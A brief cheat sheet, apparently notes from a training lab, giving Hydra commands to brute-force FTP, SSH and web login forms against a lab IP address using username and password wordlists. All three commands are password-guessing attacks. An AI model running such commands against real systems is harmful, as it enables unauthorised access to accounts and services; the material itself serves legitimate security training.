Hydra

hydra | Kali Linux Tools

Basic command

  1. FTP Bruteforce

    hydra -l user -P passlist.txt ftp://10.10.86.138
  2. SSH Bruteforce

    hydra -l <username> -P <full path to pass> 10.10.86.138 -t 4 ssh
  3. Bruteforce web credentials

	hydra -l <username> -P <wordlist> 10.10.86.138 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V